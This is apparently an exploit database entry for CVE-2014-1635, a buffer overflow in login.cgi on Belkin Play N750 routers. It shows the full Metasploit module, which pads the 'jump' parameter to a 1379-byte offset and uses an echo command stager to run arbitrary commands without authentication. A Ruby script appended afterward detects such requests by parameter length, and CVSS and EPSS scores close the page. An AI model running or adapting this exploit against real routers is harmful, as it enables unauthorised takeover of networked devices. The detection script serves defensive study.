Belkin Play N750 login.cgi Buffer Overflow

Published: 10 Mar 2015 15:49:51
Reported by: Marco Vaz <[email protected]>, Michael Messner <[email protected]>
Type: metasploit
Source: www.rapid7.com

Buffer overflow in login.cgi on Belkin Play N750 routers: HTTP requests carrying an overly long 'jump' parameter to /login.cgi allow remote, unauthenticated execution of arbitrary code.

Related

Reporter              | Title                                                                      | Published         | Family
0day.today            | Belkin n750 jump login Parameter Buffer Overflow Exploit                   | 7 Nov 2014 00:00  | zdt
Circl                 | CVE-2014-1635                                                              | 6 Nov 2014 00:00  | circl
Check Point Advisories| Belkin N750 Router Unauthenticated Remote Command Execution (CVE-2014-1635)| 12 Nov 2014 00:00 | checkpoint_advisories
CVE                   | CVE-2014-1635                                                              | 12 Nov 2014 16:00 | cve
Cvelist               | CVE-2014-1635                                                              | 12 Nov 2014 16:00 | cvelist
Exploit DB            | Belkin N750 - 'jump?login' Remote Buffer Overflow                          | 6 Nov 2014 00:00  | exploitdb
exploitpack           | Belkin N750 - jump?login Remote Buffer Overflow                            | 6 Nov 2014 00:00  | exploitpack
exploitpack           | Belkin-n750-jump-login-Parameter                                           | 4 Jan 2015 16:26  | exploitpack
NVD                   | CVE-2014-1635                                                              | 12 Nov 2014 16:55 | nvd
Packet Storm          | Belkin Play N750 login.cgi Buffer Overflow                                 | 24 Mar 2015 00:00 | packetstorm

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Belkin Play N750 login.cgi Buffer Overflow',
      'Description'    => %q{
        This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB
        Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling
        of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing
        remote unauthenticated attackers to execute arbitrary code. This module was tested in
        an emulated environment, using the version 1.10.16.m of the firmware.
      },
      'Author'         =>
        [
          'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and msf module (telnetd)
          'Michael Messner <devnull[at]s3cur1ty.de>', # msf module with echo stager
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSLE,
      'References'     =>
        [
          ['CVE', '2014-1635'],
          ['EDB', '35184'],
          ['BID', '70977'],
          ['OSVDB', '114345'],
          ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'],
          ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831']
        ],
      'Targets'        =>
        [
          [ 'Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103,  firmware 1.10.16.m',
            {
              'Offset' => 1379,
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8080
        },
      'DisclosureDate' => '2014-05-09',
      'DefaultTarget'  => 0))
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => '/'
      })

      if res &&
        [200, 301, 302].include?(res.code) &&
        res.headers['Server'] &&
        res.headers['Server'] =~ /minhttpd/ &&
        res.body =~ /u_errpaswd/

        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("Exploiting...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 200
    )
  end

  def prepare_shellcode(cmd)
    shellcode = rand_text_alpha_upper(target['Offset'])
    shellcode << 'e' << cmd
    shellcode << "\n\n"
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)
    begin
      res = send_request_cgi({
        'method'    => 'POST',
        'uri'       => '/login.cgi',
        'vars_post' => {
          'GO'   => '',
          'jump' => shellcode,
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
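The module above sends its payload as a POST to /login.cgi whose 'jump' parameter is padded to the target's 1379-byte offset. From the defender's side, that traffic shape is easy to recognise. The following Ruby is an added example, not part of the Metasploit module or the Vulners page: it classifies captured requests (represented as small hashes, constructed here rather than taken from real traffic) by checking whether a request to /login.cgi carries a 'jump' value long enough to reach the overflow offset. The 1379-byte offset comes from the module's target table; the 256-byte "suspicious" threshold and the request hash layout are assumptions of this example.

```ruby
require 'uri'

# Offset at which the module's padding ends (from the module's target table).
# Any 'jump' value at least this long can reach the overflow.
OVERFLOW_OFFSET = 1379

# Hypothetical warning threshold for values that are unusually long but short
# of the overflow offset; an assumption of this example, not from the page.
SUSPICIOUS_LENGTH = 256

# Pull the 'jump' parameter out of a request, checking the query string first
# and then a URL-encoded POST body. Returns nil when the parameter is absent.
def extract_jump(req)
  uri = URI.parse(req[:path])
  sources = []
  sources << uri.query if uri.query
  sources << req[:body] if req[:method] == 'POST' && req[:body]
  sources.each do |encoded|
    pair = URI.decode_www_form(encoded).find { |key, _| key == 'jump' }
    return pair[1] if pair
  end
  nil
end

# Classify a single request against the shape of the module's traffic:
# a request to /login.cgi carrying an oversized 'jump' parameter.
def classify_request(req)
  return :ignored unless URI.parse(req[:path]).path == '/login.cgi'
  jump = extract_jump(req)
  return :benign if jump.nil?
  return :overflow_attempt if jump.bytesize >= OVERFLOW_OFFSET
  return :suspicious if jump.bytesize >= SUSPICIOUS_LENGTH
  :benign
end

# Tally classifications over a batch of requests.
def scan_requests(reqs)
  reqs.each_with_object(Hash.new(0)) { |r, counts| counts[classify_request(r)] += 1 }
end

# Constructed sample requests (not captured traffic). The long value mimics the
# module's padding-plus-marker layout without carrying any command.
SAMPLE_REQUESTS = [
  { method: 'POST', path: '/login.cgi', body: 'GO=&jump=index.html' },
  { method: 'GET',  path: '/login.cgi?jump=status.html', body: nil },
  { method: 'POST', path: '/login.cgi',
    body: URI.encode_www_form('GO' => '', 'jump' => 'A' * SUSPICIOUS_LENGTH) },
  { method: 'POST', path: '/login.cgi',
    body: URI.encode_www_form('GO' => '', 'jump' => 'A' * OVERFLOW_OFFSET + "e\n\n") },
  { method: 'POST', path: '/status.cgi', body: 'page=1' },
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_REQUESTS.each_with_index do |req, i|
    puts "request #{i}: #{classify_request(req)}"
  end
  puts scan_requests(SAMPLE_REQUESTS).inspect
end
```

The check keys on parameter length rather than on the exact padding bytes because the module randomises its filler with rand_text_alpha_upper; a signature on the content would miss trivial variations, while a legitimate 'jump' value (a page name to redirect to) never approaches the overflow offset.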


Score (current as of 02 Oct 2020 20:00): 7.6, High risk
Vulners AI Score: 7.6
CVSS 2: 10
EPSS: 0.82871